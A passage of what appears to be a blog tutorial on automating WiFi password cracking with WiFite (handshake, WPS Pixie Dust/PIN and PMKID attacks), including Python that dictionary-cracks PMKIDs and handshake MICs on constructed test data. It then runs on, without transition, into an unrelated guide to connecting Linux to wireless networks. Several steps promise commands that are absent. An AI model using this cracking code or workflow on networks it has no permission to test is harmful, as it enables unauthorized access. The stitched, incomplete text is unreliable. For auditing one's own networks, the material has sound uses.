by hash3liZer . 18 November 2018
In this tutorial, we will automate the wireless cracking process using WiFite. Cracking wireless networks can be tricky to automate across multiple access points. A device like a Raspberry Pi is compact and helpful in such cases: consider a device that can be carried anywhere, with a script bound to it that checks for default or weak wireless passphrases.
WiFite :-
WiFite is an automated WiFi cracking tool written in Python. It is basically a wrapper around various well-known pentest tools such as airmon-ng, aircrack-ng and reaver. It is widely used for attacking WEP, WPA/WPA2 and WPS-enabled wireless networks. WiFite version 2 has been released and is likely already installed if you are running Kali or Parrot.
However, since I want this tutorial to be usable by Raspberry Pi and Ubuntu users as well, we will start by installing WiFite.
STEP 1
WiFite Installation
The project is available on github: https://github.com/derv82/wifite2
Clone the repository using git:
Now, install some prerequisites required for the PMKID attack (the PMKID tools themselves are installed in STEP 5):
Some tools are required for WiFite to run properly and others are optional; the full list is on the GitHub page linked above. The iwconfig and ifconfig utilities will already be installed. If you are missing the aircrack-ng suite, it can be installed with the apt package manager:
Now, to install WiFite:
This installs WiFite as a normal Linux command by creating a symlink in /usr/bin/. You can verify it by printing its help text:
STEP 2
Monitor mode
Your wireless card needs to be operating in monitor mode, which can be done with airmon-ng:
STEP 3
WPA/WPA2 Cracking using handshake
The standard approach used by most scripts is to capture the 4-way handshake between a client and the access point and then brute-force the passphrase offline: each wordlist candidate is turned into a PMK and PTK and checked against the MIC in the captured handshake, so no further traffic to the AP is needed. A newer method that uses the PMKID instead was discovered recently (see STEP 5). To brute-force WPA/WPA2 networks using the handshake, run the command below:
Arguments:
- -i: Monitor mode interface to use.
- --random-mac: Randomize the Wireless Adapter MAC address.
- --clients-only: Target networks with stations only.
- --wpa: Target WPA/WPA2 networks only. WPS included.
- --dict: Wordlist to use for cracking MIC hash.
STEP 4
WPS Cracking
The WPS protocol was developed to make it easy for users to connect to access points. However, the protocol itself is vulnerable on a variety of routers: the PIN can be brute-forced online, and the Pixie Dust attack recovers it offline from a single exchange on chipsets that use weak random nonces. WiFite uses Pixie Dust and WPS PIN attacks against WPS networks. To target only WPS networks:
Arguments:
- --nodeauths: Do not send deauthentication packets.
- --wps: Only target WPS networks.
- --wps-only: Only use Pin brute force and pixie dust attack.
STEP 5
WPA/WPA2 cracking using PMKID
Recently, a new method for cracking WPA/WPA2 was discovered by Jens Steube (the author of hashcat). The difference between the handshake and PMKID attacks is that the handshake attack needs the 4-way handshake between a real client and the AP, from which the key material is derived and brute-forced. With the new technique the attacker simply starts an association with the AP, and the AP replies with the first EAPOL message, which on many APs carries a PMKID (an HMAC-SHA1 over the PMK and the AP and client MAC addresses) that can be brute-forced directly, with no client present and no deauthentication needed. The PMKID attack requires two more tools. Install hcxtools:
Then install hcxdumptool:
To crack WiFi Networks using pmkid attack:
Arguments:
- --pmkid: Only use PMKID to crack wireless networks.
- --pmkid-timeout: Seconds to wait for the first EAPOL message carrying the PMKID.
- --dict: Wordlist with passwords to brute force.
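To make the difference between STEP 3 and STEP 5 concrete, here is the offline half of both attacks written out in Python. This is an added example, not code from WiFite, hashcat or the original article: the MAC addresses, nonces, EAPOL frame and wordlist are constructed test data, and the only real value is the IEEE 802.11 PBKDF2 test vector (passphrase "password", SSID "IEEE"). The PBKDF2 step is the work the cracking tools do per wordlist candidate, whether the target is a PMKID or a handshake MIC.

```python
"""Added example, not code from WiFite or the article: the offline part of the
two WPA/WPA2 attacks WiFite automates (STEP 3, handshake MIC; STEP 5, PMKID).

Assumptions: the MAC addresses, nonces, EAPOL frame and wordlist below are
constructed test data, not a real capture. The only external value is the
IEEE 802.11 PBKDF2 test vector (passphrase "password", SSID "IEEE")."""
import hashlib
import hmac

# Offset of the Key MIC field in an EAPOL-Key frame:
# 802.1X hdr(4) + desc type(1) + key info(2) + key len(2) + replay(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_OFFSET = 81
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    This is the slow step every wordlist candidate has to go through."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC).
    The AP sends this in the RSN PMKID KDE of EAPOL message 1, so one association
    attempt by the attacker (no real client) is enough to obtain it."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce, nbytes=48) -> bytes:
    """IEEE 802.11 PRF "Pairwise key expansion" (HMAC-SHA1 flavour used by WPA2-CCMP).
    Needs both nonces, i.e. a real station talking to the AP."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:nbytes]


def zero_mic(frame: bytes) -> bytes:
    """The MIC is computed over the EAPOL-Key frame with its own MIC field zeroed."""
    return frame[:MIC_OFFSET] + bytes(MIC_LEN) + frame[MIC_OFFSET + MIC_LEN:]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 Key MIC: HMAC-SHA1 keyed with the KCK (first 16 bytes of the PTK), truncated."""
    return hmac.new(kck, zero_mic(frame), hashlib.sha1).digest()[:MIC_LEN]


def crack_pmkid(target_pmkid, ssid, ap_mac, sta_mac, wordlist):
    """Dictionary attack on a PMKID: only needs the AP's message 1 and the two MACs."""
    for word in wordlist:
        if pmkid(pmk_from_passphrase(word, ssid), ap_mac, sta_mac) == target_pmkid:
            return word
    return None


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist):
    """Dictionary attack on a handshake. msg2 is EAPOL-Key message 2 as captured
    (it carries SNonce and the station's MIC); ANonce comes from message 1."""
    target_mic = msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for word in wordlist:
        ptk = ptk_from_pmk(pmk_from_passphrase(word, ssid), ap_mac, sta_mac, anonce, snonce)
        if eapol_mic(ptk[:16], msg2) == target_mic:
            return word
    return None


def hashcat_16800_line(target_pmkid, ap_mac, sta_mac, ssid):
    """The hash line format for hashcat -m 16800: PMKID*AP MAC*STA MAC*ESSID (all hex)."""
    return "*".join([target_pmkid.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex()])


def demo():
    """Build a fake network, 'capture' both artefacts and crack each from a small wordlist."""
    ssid, real_passphrase = "IEEE", "password"
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")  # constructed
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))                          # constructed
    pmk = pmk_from_passphrase(real_passphrase, ssid)

    captured_pmkid = pmkid(pmk, ap_mac, sta_mac)   # what the AP would send in message 1

    # Constructed EAPOL-Key message 2: 802.1X header (type 3, length 95), descriptor type 2,
    # key info 0x010a, key length 16, replay counter 1, SNonce, zero IV/RSC/ID, MIC, key data len 0.
    msg2 = (bytes([0x01, 0x03, 0x00, 0x5f, 0x02, 0x01, 0x0a, 0x00, 0x10]) + bytes(7) + b"\x01"
            + snonce + bytes(16) + bytes(8) + bytes(8) + bytes(MIC_LEN) + bytes(2))
    kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
    msg2 = msg2[:MIC_OFFSET] + eapol_mic(kck, msg2) + msg2[MIC_OFFSET + MIC_LEN:]

    wordlist = ["admin123", "letmein1", "password", "hunter22"]   # constructed
    return (crack_pmkid(captured_pmkid, ssid, ap_mac, sta_mac, wordlist),
            crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist))


if __name__ == "__main__":
    print(demo())
```

Note what each attack needs from the air: crack_pmkid() only needs the PMKID and the two MAC addresses from the AP's message 1, while crack_handshake() also needs ANonce, SNonce and the station's message 2, which is why WiFite deauthenticates clients to force a fresh handshake and why --pmkid can work on a network with no clients at all.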
STEP 6
Cracking Networks
To see which networks have been cracked, just execute this command:
Conclusion
WiFite is a handy wireless cracking tool that automates the work by driving other pentest utilities. It can easily be integrated with a compact device like a Raspberry Pi and is a useful tool for checking your own networks for weak passphrases and exposed WPS.
If you are a mobile Linux user, one of the first things you need to do is connect that mobile device to a wireless access point. By default, the standard Wi-Fi tools for the Linux desktops are straightforward and reliable. That of course presumes you are using the standard desktops (GNOME or KDE). But what happens when you opt for a different desktop such as E17 or Fluxbox? Or what if the “default” standards aren’t flexible enough or feature-rich enough for your needs? In those instances you need to look at a different toolset for connecting to a wireless access point.
What are your options? You could go for a GUI or use the command line. I would like to offer options for both, with the help of Wifi Radar and the ifconfig/iwconfig command-line tools.
Assumptions
I will assume that you do have wireless hardware that does work in Linux. If you have found yourself with a wireless card that does not seem to work you might consider installing the latest Ubuntu and enabling the proprietary driver for your device. Most often this will have your wireless working much quicker than trying to go the ndiswrapper route.
I will also assume you have both SSID and the authentication key for your wireless connection, otherwise you probably wouldn’t be attempting to make this connection in the first place, right?
Wifi Radar
Wifi Radar is a Python/PyGTK2 application that offers quite a bit more features and flexibility than the average tool (it will even speak the status of your connection, when connecting or disconnecting, so you know without looking whether you are connected). Wifi Radar is easy to install as well as use.
Since Wifi Radar is found in most default distribution repositories, the installation is as simple as installing any Linux application. Just open up your Add/Remove Software tool and install it. Once Wifi Radar is installed you can find it in Applications > Internet. When you start Wifi Radar it will automatically scan for wireless networks and display the available access points (see Figure 1). To connect to a network, just select it and click Connect; you will be prompted for a password (if the access point requires one).
You can also dig deep into the preferences of Wifi Radar. If you do this, do it with caution. Many of the configuration entries are commands that are set up to work with the wireless networking system, and many of these commands are fairly complex. The options you can safely tinker with are in the General tab. In this tab (see Figure 2) you can set Wifi Radar to auto-detect your wireless device (which is not set by default) and you can also set the Speak option. By default the Speak option uses the say command, which is buggy at best. Instead, reconfigure this to use the espeak command. Once you do this the Speak option will work. You will notice that Wifi Radar does not have a system tray icon. Don’t worry: when you close the application you will not be disconnected from your network.
Now let’s take a look at setting up a wireless connection from the command line.
Command Line
Believe it or not, this isn’t as challenging as it might seem. I will demonstrate how this is done on an Ubuntu machine. For other distributions you might have to alter the location or name of the scripts.
What you will need, in order to be able to establish this connection, are the following:
- ifconfig: Enable your wireless device.
- iwlist: List the available wireless access points.
- iwconfig: Configure your wireless connection.
- dhclient: Get your IP address via DHCP.
- wpa_supplicant: For use with WPA authentication.
Make sure you have all of the above tools on your computer before you continue. To test for these tools, issue the following commands from within your terminal window:
which ifconfig
which iwlist
which iwconfig
which dhclient
which wpa_supplicant
You should see the path where each tool is installed. If you receive an error that a command is not installed you will need to install it. This should not be the case, since these are standard tools that are required for wireless networking.
Let’s take a look at how this is done when you are connecting to a wireless network that does not use WPA (an open or WEP network).
Now that you have confirmed they are installed, start off with the command:
ifconfig wlan0 up
Where wlan0 is the name of your wireless device (this is most often the default). The above command brings your wireless device up so it is ready to use. The next phase is to scan for wireless access points with the command:
iwlist wlan0 scan
From the output of the scan you should see a line (or lines) like:
ESSID: 'NETWORK_NAME'
Where NETWORK_NAME is the name of an available wireless network.
Now that you have your network name (and you know it’s available) you can connect to that network with the command:
iwconfig wlan0 essid NETWORK_NAME key WIRELESS_KEY
Where NETWORK_NAME is the name of the network you want to connect to and WIRELESS_KEY is the security key for that network. NOTE: the key given to iwconfig is a WEP key, and iwconfig expects it in hex by default. If you need to use an ASCII key, prepend the s: prefix like so:
iwconfig wlan0 essid NETWORK_NAME key s:WIRELESS_KEY
Keep in mind that WEP is broken (the key can be recovered from captured traffic) and that a key typed on the command line ends up in your shell history, so use this only where WPA is not available.
With your connection made, you now have to get an IP address for your machine using the dhclient command:
dhclient wlan0
Simplify the Process
Naturally you do not want to issue all of those commands every time you bring up a wireless connection. You can make this a lot easier by creating a script to handle the task. A possible script might look like this:
#! /bin/bash
# bring the interface up, associate, then ask for an address
ifconfig wlan0 up
iwconfig wlan0 essid NETWORK_NAME key WIRELESS_KEY
dhclient wlan0
Where NETWORK_NAME and WIRELESS_KEY are unique to the network you are connecting to. Save that file with the name wireless_up and give it executable permissions with the command chmod u+x wireless_up, and you are ready to use that file to bring up your wireless. Because the script contains the key, keep it readable only by you (chmod 700 wireless_up). You can even move that file to /usr/local/bin so the command is global. All you would have to do to bring up your wireless connection is issue the command wireless_up and you’re ready to go.
WPA
For WPA-based networks you will need to take a different approach. Do the following:
1. Issue the command wpa_passphrase SSID PASSWORD (where SSID is your network ID and PASSWORD is your wireless password). This prints a network block containing a psk= string (the pre-shared key derived from the password with PBKDF2) that you will use in the configuration file. If you omit PASSWORD, wpa_passphrase reads it from standard input, which keeps it out of your shell history.
2. Edit the /etc/wpa_supplicant.conf file to reflect:
network={
  ssid="SSID"
  psk=PSK
}
Where SSID is the actual ID of your wireless network (in quotes; an unquoted value is parsed as hex) and PSK is the 64-character hex string generated by the wpa_passphrase command (unquoted). wpa_passphrase also prints a commented #psk="PASSWORD" line; leave that out. The hex psk is as good as the password for this network, so make the file readable by root only (chmod 600 /etc/wpa_supplicant.conf).
3. Run the wpa_supplicant daemon with the command:
wpa_supplicant -B -i INTERFACE -Dwext -c /etc/wpa_supplicant.conf
Where INTERFACE is the name of your wireless interface. (wext is the legacy driver interface; on current kernels use -Dnl80211 instead.)
4. Now make sure you are associated with your network with the command iwconfig INTERFACE (where INTERFACE is the name of your wireless interface).
5. Get an IP address with the command: dhclient INTERFACE (where INTERFACE is the name of your wireless interface).
You should now be on the wireless network.
You can automate this by creating an entry in /etc/network/interfaces like this:
auto INTERFACE
iface INTERFACE inet dhcp
  pre-up wpa_supplicant -Bw -Dwext -i INTERFACE -c /etc/wpa_supplicant.conf
  post-down killall -q wpa_supplicant
Where INTERFACE is the name of your wireless interface.
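As an added example (not code from the article or from wpa_supplicant itself), the following Python does what the wpa_passphrase step does and writes the network block with the details above taken care of: a quoted (or, for awkward names, hex-encoded) ssid, an unquoted hex psk, and a 0600 file mode because the psk value is as sensitive as the password. The output path is whatever the caller passes to write_config(); demo() writes into a temporary directory. The PSK for SSID "IEEE" and passphrase "password" is the IEEE 802.11 test vector.

```python
"""Added example, not from the article: a Python equivalent of `wpa_passphrase`
that derives the psk= value and writes a wpa_supplicant network block with the
permissions the secret in it deserves.

Assumptions: the output path is chosen by the caller; demo() uses a temp directory."""
import hashlib
import os
import stat
import tempfile


def wpa_psk_hex(ssid: str, passphrase: str) -> str:
    """The psk= value: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes), as hex.
    Same limits wpa_passphrase enforces: 8..63 printable ASCII characters, SSID 1..32 bytes."""
    if not (8 <= len(passphrase) <= 63 and passphrase.isascii() and passphrase.isprintable()):
        raise ValueError("passphrase must be 8..63 printable ASCII characters")
    ssid_bytes = ssid.encode()
    if not 1 <= len(ssid_bytes) <= 32:
        raise ValueError("SSID must be 1..32 bytes")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid_bytes, 4096, 32).hex()


def ssid_field(ssid: str) -> str:
    """Quote the SSID; fall back to wpa_supplicant's hex form for names a quoted string
    can't carry safely (quotes, backslashes, non-ASCII), so an odd or hostile SSID
    cannot break out of the config syntax."""
    if ssid.isascii() and ssid.isprintable() and '"' not in ssid and "\\" not in ssid:
        return 'ssid="%s"' % ssid
    return "ssid=" + ssid.encode().hex()


def network_block(ssid: str, passphrase: str) -> str:
    """The block to paste into /etc/wpa_supplicant.conf. An unquoted ssid=NAME would be
    read as hex by wpa_supplicant; the 64-hex-digit psk must stay unquoted."""
    return "network={\n\t%s\n\tpsk=%s\n}\n" % (ssid_field(ssid), wpa_psk_hex(ssid, passphrase))


def write_config(path: str, ssid: str, passphrase: str) -> str:
    """Create or overwrite the config with mode 0600: the hex psk is equivalent to the
    password for this SSID, so nobody but root should be able to read it."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(network_block(ssid, passphrase))
    os.chmod(path, 0o600)   # O_CREAT's mode is ignored when the file already existed
    return path


def demo():
    """Write a config for the test-vector network and report its mode and psk line."""
    path = os.path.join(tempfile.mkdtemp(), "wpa_supplicant.conf")
    write_config(path, "IEEE", "password")
    mode = stat.S_IMODE(os.stat(path).st_mode)
    with open(path) as f:
        psk_line = [line.strip() for line in f if line.strip().startswith("psk=")][0]
    return mode, psk_line


if __name__ == "__main__":
    print(demo())
```

Run it as root with a real SSID and passphrase to produce /etc/wpa_supplicant.conf directly, or copy the network_block() output into an existing file; either way the passphrase never has to appear on a command line.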
Final thoughts
There are plenty of ways to connect to a wireless network in Linux. So long as your hardware is working, you shouldn’t have a problem finding a tool that will help you get connected. Whether it’s a GUI or command line, Linux has you covered on the wireless front.